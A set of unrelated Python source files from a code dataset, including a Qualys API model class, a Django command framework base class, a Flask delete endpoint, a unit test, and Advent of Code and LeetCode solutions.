def docker_hub_org(self, docker_hub_org):\n        \"\"\"Sets the docker_hub_org of this RegistryResponse.\n\n\n        :param docker_hub_org: The docker_hub_org of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._docker_hub_org = docker_hub_org\n\n    @property\n    def last_scanned(self):\n        \"\"\"Gets the last_scanned of this RegistryResponse.  # noqa: E501\n\n\n        :return: The last_scanned of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._last_scanned\n\n    @last_scanned.setter\n    def last_scanned(self, last_scanned):\n        \"\"\"Sets the last_scanned of this RegistryResponse.\n\n\n        :param last_scanned: The last_scanned of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._last_scanned = last_scanned\n\n    @property\n    def provider_type(self):\n        \"\"\"Gets the provider_type of this RegistryResponse.  # noqa: E501\n\n\n        :return: The provider_type of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._provider_type\n\n    @provider_type.setter\n    def provider_type(self, provider_type):\n        \"\"\"Sets the provider_type of this RegistryResponse.\n\n\n        :param provider_type: The provider_type of this RegistryResponse. # noqa: E501\n        :type: str\n        \"\"\"\n        allowed_values = [\"DockerHub\", \"AWS\"]  # noqa: E501\n        if self.local_vars_configuration.client_side_validation and provider_type not in allowed_values:  # noqa: E501\n            raise ValueError(\n                \"Invalid value for `provider_type` ({0}), must be one of {1}\"  # noqa: E501\n                .format(provider_type, allowed_values)\n            )\n\n        self._provider_type = provider_type\n\n    @property\n    def registry_type(self):\n        \"\"\"Gets the registry_type of this RegistryResponse.  # noqa: E501\n\n\n        :return: The registry_type of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._registry_type\n\n    @registry_type.setter\n    def registry_type(self, registry_type):\n        \"\"\"Sets the registry_type of this RegistryResponse.\n\n\n        :param registry_type: The registry_type of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n        allowed_values = [\"V2_PRIVATE\", \"V2\", \"DockerHub\", \"AWS\", \"Azure\"]  # noqa: E501\n        if self.local_vars_configuration.client_side_validation and registry_type not in allowed_values:  # noqa: E501\n            raise ValueError(\n                \"Invalid value for `registry_type` ({0}), must be one of {1}\"  # noqa: E501\n                .format(registry_type, allowed_values)\n            )\n\n        self._registry_type = registry_type\n\n    @property\n    def registry_uri(self):\n        \"\"\"Gets the registry_uri of this RegistryResponse.  # noqa: E501\n\n\n        :return: The registry_uri of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._registry_uri\n\n    @registry_uri.setter\n    def registry_uri(self, registry_uri):\n        \"\"\"Sets the registry_uri of this RegistryResponse.\n\n\n        :param registry_uri: The registry_uri of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._registry_uri = registry_uri\n\n    @property\n    def registry_uuid(self):\n        \"\"\"Gets the registry_uuid of this RegistryResponse.  # noqa: E501\n\n\n        :return: The registry_uuid of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._registry_uuid\n\n    @registry_uuid.setter\n    def registry_uuid(self, registry_uuid):\n        \"\"\"Sets the registry_uuid of this RegistryResponse.\n\n\n        :param registry_uuid: The registry_uuid of this RegistryResponse.  # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._registry_uuid = registry_uuid\n\n    @property\n    def repo_count(self):\n        \"\"\"Gets the repo_count of this RegistryResponse.  # noqa: E501\n\n\n        :return: The repo_count of this RegistryResponse.  # noqa: E501\n        :rtype: int\n        \"\"\"\n        return self._repo_count\n\n    @repo_count.setter\n    def repo_count(self, repo_count):\n        \"\"\"Sets the repo_count of this RegistryResponse.\n\n\n        :param repo_count: The repo_count of this RegistryResponse.  # noqa: E501\n        :type: int\n        \"\"\"\n\n        self._repo_count = repo_count\n\n    @property\n    def schedule_status_list(self):\n        \"\"\"Gets the schedule_status_list of this RegistryResponse.  # noqa: E501\n\n\n        :return: The schedule_status_list of this RegistryResponse.  # noqa: E501\n        :rtype: dict(str, int)\n        \"\"\"\n        return self._schedule_status_list\n\n    @schedule_status_list.setter\n    def schedule_status_list(self, schedule_status_list):\n        \"\"\"Sets the schedule_status_list of this RegistryResponse.\n\n\n        :param schedule_status_list: The schedule_status_list of this RegistryResponse.  # noqa: E501\n        :type: dict(str, int)\n        \"\"\"\n\n        self._schedule_status_list = schedule_status_list\n\n    @property\n    def total_images(self):\n        \"\"\"Gets the total_images of this RegistryResponse.  # noqa: E501\n\n\n        :return: The total_images of this RegistryResponse. # noqa: E501\n        :rtype: int\n        \"\"\"\n        return self._total_images\n\n    @total_images.setter\n    def total_images(self, total_images):\n        \"\"\"Sets the total_images of this RegistryResponse.\n\n\n        :param total_images: The total_images of this RegistryResponse.  # noqa: E501\n        :type: int\n        \"\"\"\n\n        self._total_images = total_images\n\n    @property\n    def total_scanned_images(self):\n        \"\"\"Gets the total_scanned_images of this RegistryResponse.  # noqa: E501\n\n\n        :return: The total_scanned_images of this RegistryResponse.  # noqa: E501\n        :rtype: int\n        \"\"\"\n        return self._total_scanned_images\n\n    @total_scanned_images.setter\n    def total_scanned_images(self, total_scanned_images):\n        \"\"\"Sets the total_scanned_images of this RegistryResponse.\n\n\n        :param total_scanned_images: The total_scanned_images of this RegistryResponse.  # noqa: E501\n        :type: int\n        \"\"\"\n\n        self._total_scanned_images = total_scanned_images\n\n    @property\n    def total_vulnerable_images(self):\n        \"\"\"Gets the total_vulnerable_images of this RegistryResponse.  # noqa: E501\n\n\n        :return: The total_vulnerable_images of this RegistryResponse.  # noqa: E501\n        :rtype: int\n        \"\"\"\n        return self._total_vulnerable_images\n\n    @total_vulnerable_images.setter\n    def total_vulnerable_images(self, total_vulnerable_images):\n        \"\"\"Sets the total_vulnerable_images of this RegistryResponse.\n\n\n        :param total_vulnerable_images: The total_vulnerable_images of this RegistryResponse.  # noqa: E501\n        :type: int\n        \"\"\"\n\n        self._total_vulnerable_images = total_vulnerable_images\n\n    @property\n    def updated(self):\n        \"\"\"Gets the updated of this RegistryResponse.  # noqa: E501\n\n\n        :return: The updated of this RegistryResponse.  # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._updated\n\n    @updated.setter\n    def updated(self, updated):\n        \"\"\"Sets the updated of this RegistryResponse.\n\n\n        :param updated: The updated of this RegistryResponse. # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._updated = updated\n\n    def to_dict(self):\n        \"\"\"Returns the model properties as a dict\"\"\"\n        result = {}\n\n        for attr, _ in six.iteritems(self.openapi_types):\n            value = getattr(self, attr)\n            if isinstance(value, list):\n                result[attr] = list(map(\n                    lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n                    value\n                ))\n            elif hasattr(value, \"to_dict\"):\n                result[attr] = value.to_dict()\n            elif isinstance(value, dict):\n                result[attr] = dict(map(\n                    lambda item: (item[0], item[1].to_dict())\n                    if hasattr(item[1], \"to_dict\") else item,\n                    value.items()\n                ))\n            else:\n                result[attr] = value\n\n        return result\n\n    def to_str(self):\n        \"\"\"Returns the string representation of the model\"\"\"\n        return pprint.pformat(self.to_dict())\n\n    def __repr__(self):\n        \"\"\"For `print` and `pprint`\"\"\"\n        return self.to_str()\n\n    def __eq__(self, other):\n        \"\"\"Returns true if both objects are equal\"\"\"\n        if not isinstance(other, RegistryResponse):\n            return False\n\n        return self.to_dict() == other.to_dict()\n\n    def __ne__(self, other):\n        \"\"\"Returns true if both objects are not equal\"\"\"\n        if not isinstance(other, RegistryResponse):\n            return True\n\n        return self.to_dict() != other.to_dict()\n","sub_path":"qualys_cs_api/models/registry_response.py","file_name":"registry_response.py","file_ext":"py","file_size_in_byte":15329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"80082521","text":"from modules.base_module import Module\n\nclass_name = \"UserConfirm\"\n\n\nclass UserConfirm(Module):\n    prefix = \"cf\"\n\n    def __init__(self, server):\n        self.server = server\n        self.commands = {\"uc\": self.user_confirm,\n                         \"uca\": self.user_confirm_approve,\n                         \"ucd\": self.user_confirm_decline}\n\n    def user_confirm(self, msg, client):\n        for tmp in self.server.online.copy():\n            if tmp.uid == msg[2][\"uid\"]:\n                tmp.send([\"cf.uc\", {\"uid\": client.uid, \"at\": msg[2][\"at\"]}])\n                break\n\n    def user_confirm_approve(self, msg, client):\n        for tmp in self.server.online.copy():\n            if tmp.uid == msg[2][\"uid\"]:\n                tmp.send([\"cf.uca\", {\"uid\": client.uid, \"at\": msg[2][\"at\"]}])\n                break\n\n    def user_confirm_decline(self, msg, client):\n        for tmp in self.server.online.copy():\n            if tmp.uid == msg[2][\"uid\"]:\n                tmp.send([\"cf.ucd\", {\"uid\": client.uid, \"at\": msg[2][\"at\"]}])\n                break\n","sub_path":"modules/confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"457233649","text":"from django.conf import settings\nfrom django.db import connections\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.management.base import CommandError, CommandParser\nfrom django.utils.module_loading import import_string\n\nfrom db_mutex import DBMutexError, DBMutexTimeoutError\nfrom db_mutex.models import DBMutex\nfrom db_mutex.db_mutex import db_mutex\n\nfrom rest_framework.compat import coreapi, coreschema\nfrom rest_framework.schemas.coreapi import field_to_schema\n\nfrom settings import version\nfrom settings.roles import Roles\nfrom data.environment.models import Environment\nfrom data.user.models import User\nfrom systems.commands.index import CommandMixin\nfrom systems.commands.mixins import renderer\nfrom systems.commands import args, messages, help, options\nfrom systems.api.schema import command\nfrom utility.terminal import TerminalMixin\nfrom utility.runtime import Runtime\nfrom utility.text import wrap, wrap_page\nfrom utility.display import format_traceback\nfrom utility.parallel import Parallel\nfrom utility.data import deep_merge\n\nimport sys\nimport os\nimport time\nimport argparse\nimport re\nimport shutil\nimport threading\nimport queue\nimport string\nimport copy\nimport yaml\nimport json\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseCommand(\n    TerminalMixin,\n    renderer.RendererMixin,\n    CommandMixin('user'),\n    CommandMixin('environment'),\n    CommandMixin('group'),\n    CommandMixin('config'),\n    CommandMixin('module')\n):\n    display_lock = threading.Lock()\n    thread_lock = threading.Lock()\n\n\n    def __init__(self, name, parent = None):\n        self.facade_index = {}\n\n        self.name = name\n        self.parent_instance = parent\n        self.exec_parent = None\n\n        self.confirmation_message = 'Are you absolutely sure?'\n        self.messages = queue.Queue()\n        self.parent_messages = None\n        self.mute = False\n\n        self.schema = {}\n        self.parser = None\n        self.options = options.AppOptions(self)\n        self.option_map = {}\n        self.descriptions = help.CommandDescriptions()\n\n        super().__init__()\n\n\n    @property\n    def manager(self):\n        return settings.MANAGER\n\n\n    def queue(self, msg):\n        def _queue_parents(command, data):\n            if command.parent_messages:\n                command.parent_messages.put(data)\n            if command.parent_instance:\n                _queue_parents(command.parent_instance, data)\n\n        data = msg.render()\n        logger.debug(\"Adding command queue message: {}\".format(data))\n\n        self.messages.put(data)\n        _queue_parents(self, data)\n        return data\n\n    def flush(self):\n        logger.debug(\"Flushing command queue\")\n        self.messages.put(None)\n\n    def create_message(self, data, decrypt = True):\n        return messages.AppMessage.get(data, decrypt = decrypt)\n\n    def get_messages(self, flush = True):\n        messages = []\n\n        if flush:\n            self.flush()\n\n        for message in iter(self.messages.get, None):\n            messages.append(message)\n        return messages\n\n\n    def add_schema_field(self, name, field, optional = True):\n        self.schema[name] = coreapi.Field(\n            name = name,\n            location = 'form',\n            required = not optional,\n            schema = field_to_schema(field),\n            type = type(field).__name__.lower()\n        )\n\n    def get_schema(self):\n        return command.CommandSchema(list(self.schema.values()), re.sub(r'\\s+', ' ', self.get_description(False)))\n\n\n    def create_parser(self):\n\n        def display_error(message):\n            self.warning(message + \"\\n\")\n            self.print_help()\n            self.exit(1)\n\n        epilog = self.get_epilog()\n        if epilog:\n            epilog = \"\\n\".join(wrap_page(epilog))\n\n        parser = CommandParser(\n            prog = self.command_color('{} {}'.format(settings.APP_NAME, self.get_full_name())),\n            description = \"\\n\".join(wrap_page(\n                self.get_description(False),\n                init_indent = ' ',\n                init_style = self.header_color(),\n                indent = '  '\n            )),\n            epilog = epilog,\n            formatter_class = argparse.RawTextHelpFormatter,\n            called_from_command_line = True\n        )\n        parser.error = display_error\n\n        self.add_arguments(parser)\n        return parser\n\n    def add_arguments(self, parser):\n        self.parser = parser\n        self.parse_base()\n\n\n    def parse(self):\n        # Override in subclass\n        pass\n\n    def parse_base(self):\n        self.option_map = {}\n\n        if not self.parse_passthrough():\n            self.parse_verbosity()\n            self.parse_no_parallel()\n            self.parse_no_color()\n            self.parse_debug()\n            self.parse_display_width()\n\n            if not settings.API_EXEC:\n                self.parse_environment_host()\n                self.parse_version()\n\n            self.parse()\n\n    def parse_passthrough(self):\n        return False\n\n\n    def parse_environment_host(self):\n        self.parse_variable('environment_host',\n            '--host', str,\n            \"environment host name (default: {})\".format(settings.DEFAULT_HOST_NAME),\n            value_label = 'NAME',\n            default = settings.DEFAULT_HOST_NAME\n        )\n\n    @property\n    def environment_host(self):\n        return self.options.get('environment_host', settings.DEFAULT_HOST_NAME)\n\n\n    def parse_verbosity(self):\n        self.parse_variable('verbosity',\n            '--verbosity', int,\n            \"\\n\".join(wrap(\"verbosity level; 0=no output, 1=minimal output, 2=normal output, 3=verbose output\", 60)),\n            value_label = 'LEVEL',\n            default = 2,\n            choices = (0, 1, 2, 3)\n        )\n\n    @property\n    def verbosity(self):\n        return self.options.get('verbosity', 2)\n\n\n    def parse_version(self):\n        self.parse_flag('version', '--version', \"show environment runtime version information\")\n\n    def parse_display_width(self):\n        columns, rows = shutil.get_terminal_size(fallback = (settings.DISPLAY_WIDTH, 25))\n        self.parse_variable('display_width',\n            '--display-width', int,\n            \"CLI display width (default {} characters)\".format(columns),\n            value_label = 'WIDTH',\n            default = columns\n        )\n\n    @property\n    def display_width(self):\n        return self.options.get('display_width', Runtime.width())\n\n    def parse_no_color(self):\n        self.parse_flag('no_color', '--no-color', \"don't colorize the command output\")\n\n    @property\n    def no_color(self):\n        return self.options.get('no_color', not Runtime.color())\n\n    def parse_debug(self):\n        self.parse_flag('debug', '--debug', 'run in debug mode with error tracebacks')\n\n    @property\n    def debug(self):\n        return self.options.get('debug', Runtime.debug())\n\n    def parse_no_parallel(self):\n        self.parse_flag('no_parallel', '--no-parallel', 'disable parallel processing')\n\n    @property\n    def no_parallel(self):\n        return self.options.get('no_parallel', not Runtime.parallel())\n\n\n    def interpolate_options(self):\n        return True\n\n\n    def server_enabled(self):\n        return True\n\n    def remote_exec(self):\n        return self.server_enabled()\n\n    def groups_allowed(self):\n        return False\n\n\n    def get_version(self):\n        return version.VERSION\n\n    def get_priority(self):\n        return 1\n\n\n    def get_parent_name(self):\n        if self.parent_instance and self.parent_instance.name != 'root':\n            return self.parent_instance.get_full_name()\n        return ''\n\n    def get_full_name(self):\n        return \"{} {}\".format(self.get_parent_name(), self.name).strip()\n\n    def get_description(self, overview = False):\n        return self.descriptions.get(self.get_full_name(), overview)\n\n    def get_epilog(self):\n        return None\n\n\n    @property\n    def active_user(self):\n        return self._user.active_user\n\n    def check_access(self, instance, reset = False):\n        return self.check_access_by_groups(instance, instance.access_groups(reset))\n\n    def check_access_by_groups(self, instance, groups):\n        user_groups = [ Roles.admin ]\n\n        if not groups or self.active_user.name == settings.ADMIN_USER:\n            return True\n\n        for group in groups:\n            if isinstance(group, (list, tuple)):\n                user_groups.extend(list(group))\n            else:\n                user_groups.append(group)\n\n        if len(user_groups):\n            if not self.active_user.env_groups.filter(name__in = user_groups).exists():\n                self.warning(\"Operation {} {} {} access requires at least one of the following roles in environment: {}\".format(\n                    self.get_full_name(),\n                    instance.facade.name,\n                    instance.name,\n                    \", \".join(user_groups)\n                ))\n                return False\n\n        return True\n\n\n    def get_provider(self, type, name, *args, **options):\n        type_components = type.split(':')\n        type = type_components[0]\n        subtype = type_components[1] if len(type_components) > 1 else None\n\n        base_provider = self.manager.index.get_plugin_base(type)\n        providers = self.manager.index.get_plugin_providers(type, True)\n\n        if name is None or name in ('help', 'base'):\n            provider_class = base_provider\n        elif name in providers.keys():\n            provider_class = providers[name]\n        else:\n            self.error(\"Plugin {} provider {} not supported\".format(type, name))\n\n        try:\n            return provider_class(type, name, self, *args, **options).context(subtype, self.test)\n        except Exception as e:\n            self.error(\"Plugin {} provider {} error: {}\".format(type, name, e))\n\n\n    def print_help(self):\n        parser = self.create_parser()\n        self.info(parser.format_help())\n\n\n    def info(self, message, name = None, prefix = None):\n        with self.display_lock:\n            if not self.mute:\n                msg = messages.InfoMessage(str(message),\n                    name = name,\n                    prefix = prefix,\n                    silent = False\n                )\n                self.queue(msg)\n\n                if not settings.API_EXEC and self.verbosity > 0:\n                    msg.display(\n                        debug = self.debug,\n                        disable_color = self.no_color,\n                        width = self.display_width\n                    )\n\n    def data(self, label, value, name = None, prefix = None, silent = False):\n        with self.display_lock:\n            if not self.mute:\n                msg = messages.DataMessage(str(label), value,\n                    name = name,\n                    prefix = prefix,\n                    silent = silent\n                )\n                self.queue(msg)\n\n                if not settings.API_EXEC and self.verbosity > 0:\n                    msg.display(\n                        debug = self.debug,\n                        disable_color = self.no_color,\n                        width = self.display_width\n                    )\n\n    def silent_data(self, name, value):\n        self.data(name, value,\n            name = name,\n            silent = True\n        )\n\n    def notice(self, message, name = None, prefix = None):\n        with self.display_lock:\n            if not self.mute:\n                msg = messages.NoticeMessage(str(message),\n                    name = name,\n                    prefix = prefix,\n                    silent = False\n                )\n                self.queue(msg)\n\n                if not settings.API_EXEC and self.verbosity > 0:\n                    msg.display(\n                        debug = self.debug,\n                        disable_color = self.no_color,\n                        width = self.display_width\n                    )\n\n    def success(self, message, name = None, prefix = None):\n        with self.display_lock:\n            if not self.mute:\n                msg = messages.SuccessMessage(str(message),\n                    name = name,\n                    prefix = prefix,\n                    silent = False\n                )\n                self.queue(msg)\n\n                if not settings.API_EXEC and self.verbosity > 0:\n                    msg.display(\n                        debug = self.debug,\n                        disable_color = self.no_color,\n                        width = self.display_width\n                    )\n\n    def warning(self, message, name = None, prefix = None):\n        with self.display_lock:\n            msg = messages.WarningMessage(str(message),\n                name = name,\n                prefix = prefix,\n                silent = False\n            )\n            self.queue(msg)\n\n            if not settings.API_EXEC and self.verbosity > 0:\n                msg.display(\n                    debug = self.debug,\n                    disable_color = self.no_color,\n                    width = self.display_width\n                )\n\n    def error(self, message, name = None, prefix = None, terminate = True, traceback = None, error_cls = CommandError, silent = False):\n        with self.display_lock:\n            msg = messages.ErrorMessage(str(message),\n                traceback = traceback,\n                name = name,\n                prefix = prefix,\n                silent = silent\n            )\n            if not traceback:\n                msg.traceback = format_traceback()\n\n            self.queue(msg)\n\n            if not settings.API_EXEC and not silent:\n                msg.display(\n                    debug = self.debug,\n                    disable_color = self.no_color,\n                    width = self.display_width\n                )\n\n        if terminate:\n            raise error_cls('')\n\n    def table(self, data, name = None, prefix = None, silent = False, row_labels = False):\n        with self.display_lock:\n            if not self.mute:\n                msg = messages.TableMessage(data,\n                    name = name,\n                    prefix = prefix,\n                    silent = silent,\n                    row_labels = row_labels\n                )\n                self.queue(msg)\n\n                if not settings.API_EXEC and self.verbosity > 0:\n                    msg.display(\n                        debug = self.debug,\n                        disable_color = self.no_color,\n                        width = self.display_width\n                    )\n\n    def silent_table(self, name, data):\n        self.table(data,\n            name = name,\n            silent = True\n        )\n\n    def confirmation(self, message = None):\n        if not settings.API_EXEC and not self.force:\n            if not message:\n                message = self.confirmation_message\n\n            confirmation = input(\"{} (type YES to confirm): \".format(message))\n\n            if re.match(r'^[Yy][Ee][Ss]$', confirmation):\n                return True\n\n            self.error(\"User aborted\", 'abort')\n\n\n    def format_fields(self, data, process_func = None):\n        fields = self.get_schema().get_fields()\n        params = {}\n\n        for key, value in data.items():\n            if process_func and callable(process_func):\n                key, value = process_func(key, value)\n\n            if value is not None and value != '':\n                if key in fields:\n                    type = fields[key].type\n\n                    if type in ('dictfield', 'listfield'):\n                        params[key] = json.loads(value)\n                    elif type == 'booleanfield':\n                        params[key] = json.loads(value.lower())\n                    elif type == 'integerfield':\n                        params[key] = int(value)\n                    elif type == 'floatfield':\n                        params[key] = float(value)\n\n                    if key not in params:\n                        params[key] = value\n                else:\n                    params[key] = None\n\n        return params\n\n\n    def run_list(self, items, callback):\n        results = Parallel.list(items, callback, disable_parallel = self.no_parallel)\n\n        if results.aborted:\n            for thread in results.errors:\n                self.error(thread.error, prefix = \"[ {} ]\".format(thread.name), traceback = thread.traceback, terminate = False)\n\n            self.error(\"Parallel run failed\", silent = True)\n\n        return results\n\n    def run_exclusive(self, lock_id, callback, error_on_locked = False, wait = True, timeout = 600, interval = 2):\n        if not lock_id:\n            callback()\n        else:\n            start_time = time.time()\n            current_time = start_time\n\n            while (current_time - start_time) <= timeout:\n                try:\n                    with db_mutex(lock_id):\n                        callback()\n                    break\n\n                except DBMutexError:\n                    if error_on_locked:\n                        self.error(\"Could not obtain lock for {}\".format(lock_id))\n                    if not wait:\n                        break\n\n                except DBMutexTimeoutError:\n                    logger.warning(\"Task {} completed but the lock timed out\".format(lock_id))\n                    break\n\n                except Exception as e:\n                    DBMutex.objects.filter(lock_id = lock_id).delete()\n                    raise e\n\n                time.sleep(interval)\n                current_time = time.time()\n\n\n    def ensure_resources(self):\n        for facade_index_name in sorted(self.facade_index.keys()):\n            if facade_index_name not in ['00_environment', '00_user']:\n                self.facade_index[facade_index_name]._ensure(self)\n\n    def set_options(self, options):\n        self.options.clear()\n\n        host = options.pop('environment_host', None)\n        if host:\n            self.options.add('environment_host', host, False)\n\n        for key, value in options.items():\n            self.options.add(key, value)\n\n\n    def bootstrap_ensure(self):\n        return True\n\n    def bootstrap(self, options, primary = False):\n        if primary:\n            if options.get('debug', False):\n                Runtime.debug(True)\n\n            if options.get('no_parallel', False):\n                Runtime.parallel(False)\n\n            if options.get('no_color', False):\n                Runtime.color(False)\n\n            if options.get('display_width', False):\n                Runtime.width(options.get('display_width'))\n\n        self._environment._ensure(self)\n        self._user._ensure(self)\n\n        self.set_options(options)\n        if primary and self.bootstrap_ensure():\n            self.ensure_resources()\n\n    def handle(self, options):\n        # Override in subclass\n        pass\n\n\n    def run_from_argv(self, argv):\n        parser = self.create_parser()\n        args = argv[(len(self.get_full_name().split(' ')) + 1):]\n\n        if not self.parse_passthrough():\n            if '--version' in argv:\n                return self.manager.index.find_command(\n                    'version',\n                    main = True\n                ).run_from_argv([])\n\n            elif '-h' in argv or '--help' in argv:\n                return self.print_help()\n\n            options = vars(parser.parse_args(args))\n        else:\n            options = { 'args': args }\n\n        try:\n            self.bootstrap(options, True)\n            self.handle(options, True)\n        finally:\n            try:\n                connections.close_all()\n            except ImproperlyConfigured:\n                pass\n","sub_path":"app/systems/commands/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"246863201","text":"import sys\nimport time\n\n\ndatas = [val for val in sys.stdin]\n\ndef parse(datas):\n    res = []\n    for data in datas:\n        date = data[1:].split(\"]\")[0]\n        conv = time.strptime(date,\"%Y-%m-%d %H:%M\")\n        date = time.strftime(\"%Y-%m-%d %H:%M\", conv)\n        if int(time.strftime(\"%H\", conv)) == 23:\n            _time = \"00:00\"\n        else:\n            _time = time.strftime(\"%H:%M\", conv)\n        if \"#\" in data:\n            state = \"#\" + data.split(\"#\")[1].split(\" \")[0]\n        else:\n            if \"wakes up\" in data.split(\"] \")[1]:\n                state = 1\n            else:\n                state = 0\n        res.append([date, state, _time])\n    return (res)\n\ndatas = parse(datas)\ndatas = sorted(datas, key=lambda datas: datas[0])\n\nfor data in datas:\n    print(data)\n\nturns = []\ncur_tab = [\"1\"] * 60\nold_id = datas[0][1]\ndatas.pop(0)\nfor i, data in enumerate(datas):\n    if isinstance(data[1], str) and \"#\" in data[1]:\n        new_id = data[1]\n        turns.append({old_id: cur_tab})\n        cur_tab = [\"1\"] * 60\n        old_id = new_id\n    if data[1] == 1 and datas[i - 1][1] == 0:\n        start = time.strptime(datas[i - 1][2],\"%H:%M\")\n        end = time.strptime(data[2],\"%H:%M\")\n        chunk = int(time.strftime(\"%M\", end)) - int(time.strftime(\"%M\", start))\n        cur_tab[int(time.strftime(\"%M\", start)) : int(time.strftime(\"%M\", end))] = [\"0\"] * chunk\n    if i == len(datas) - 1:\n        turns.append({old_id: cur_tab})\n\nprint(\"\\nID     Minute\\\n       \\n       000000000011111111112222222222333333333344444444445555555555\\\n       \\n       012345678901234567890123456789012345678901234567890123456789\\n\")\n\n\nfor turn in turns:\n    for key, val in turn.items():\n        print(key, ''.join(val))\n\nguards_s = {}\nfor turn in turns:\n    for key, val in turn.items():\n        if key not in guards_s:\n            guards_s[key] = 60 - sum([int(i) for i in val])\n        else:\n            guards_s[key] += 60 - sum([int(i) for i in val])\n\nprint(\"\\n\", guards_s)\n\ndef keywithmaxval(d):\n    \"\"\" a) create a list of the dict's keys and values; \n    b) return the key with the max value\"\"\"  \n    v=list(d.values())\n    k=list(d.keys())\n    return k[v.index(max(v))]\n\nsleepy_guard = keywithmaxval(guards_s)\nprint(\"\\n\", sleepy_guard)\n\nguards_sleep = [0] * 60\nfor turn in turns:\n    for key, val in turn.items():\n        if key == sleepy_guard:\n            for i, elem in enumerate(guards_sleep):\n                guards_sleep[i] += 0 if val[i] == \"1\" else 1\n\nsleepy_minute = guards_sleep.index(max(guards_sleep))\nprint(\"\\n\", sleepy_minute)\nsleepy_guard = int(keywithmaxval(guards_s)[1:])\nprint(\"\\n\", sleepy_minute * sleepy_guard)\n","sub_path":"2018/D4/puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"104013390","text":"from .db import db\nfrom .usersOnTeam import UsersOnTeams\n\n\nclass Team(db.Model):\n    __tablename__ = \"teams\"\n\n    id = db.Column(db.Integer, nullable = False, primary_key = True)\n    teamName = db.Column(db.String(50), nullable = False)\n    \n    users = db.relationship(\"User\", secondary=UsersOnTeams, back_populates=\"teams\")\n    projects = db.relationship(\"Project\", back_populates=\"team\")\n\n    def to_dict(self):\n        return {\n            \"id\": self.id,\n            \"teamName\": self.teamName,\n        }","sub_path":"app/models/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"380800648","text":"'''\r\nCreated on May 28, 2013\r\nmodule exports the TestPerson class\r\n@author: Vanessa\r\n'''\r\n\r\nfrom personmodule import Person\r\nimport unittest\r\n\r\nclass TestPerson(unittest.TestCase):\r\n    \"\"\"\r\n    test class that will contain functions which test each of the functions in the Person class to make \r\n    sure they work as they should\r\n    \"\"\"  \r\n    \r\n    def setUp(self):\r\n        personV = Person()\r\n        \r\n    def test_set_get_age(self):\r\n        \"\"\"\r\n        tests the set_age() and get_age() functions\r\n        accepts age1 and sets the user's age\r\n        returns True if the function returns the user's correct age\r\n        \"\"\"\r\n        personV = Person()\r\n        personV.set_age(18)\r\n        self.assertEqual(personV.get_age(), 18)\r\n        \r\n    def test_set_get_name(self):\r\n        \"\"\"\r\n        tests the set_name() and get_name() functions\r\n        accepts name1 and sets the user's name\r\n        returns True if the function returns the user's correct name\r\n        \"\"\"\r\n        personV = Person()\r\n        personV.set_name(\"Vanessa\")\r\n        self.assertEqual(personV.get_name(), \"Vanessa\")\r\n\r\nif __name__ == \"__main__\":\r\n    unittest.main()      ","sub_path":"SocialNetworkPython2/testperson.py","file_name":"testperson.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"633659336","text":"from flask import g, abort\n\nfrom .utils import json_response\nfrom ._03_post_method import app\n\n\n@app.route('/book/<int:book_id>', methods=['DELETE'])\ndef book_delete(book_id):\n    params = {'id': book_id}\n    query = 'SELECT count(*) FROM book WHERE book.id = :id'\n    cursor = g.db.execute(query, params)\n\n    # Check if book exists\n    if cursor.fetchone()[0] == 0:\n        # Doesn't exist. Return 404.\n        abort(404)\n\n    # Delete it\n    delete_query = 'DELETE FROM book WHERE book.id = :id'\n    g.db.execute(delete_query, {'id': book_id})\n    g.db.commit()\n\n    return json_response(status=204)\n\n\n@app.errorhandler(404)\ndef not_found(e):\n    return '', 404\n","sub_path":"python/api/_04_delete_method.py","file_name":"_04_delete_method.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"260773525","text":"class Solution:\r\n    def rotateRight(self, head: ListNode, k: int) -> ListNode:\r\n        if head == None or head.next == None:\r\n            return head\r\n        count = 1\r\n        p = head\r\n        while p.next:\r\n            count+=1\r\n            p=p.next\r\n        rot = k%count\r\n        temp = head\r\n        p.next = head\r\n        for i in range(count-rot-1):\r\n            temp = temp.next\r\n        answer = temp.next\r\n        temp.next = None\r\n        return answer\r\n","sub_path":"LeetCode/Python/1-100/61.py","file_name":"61.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
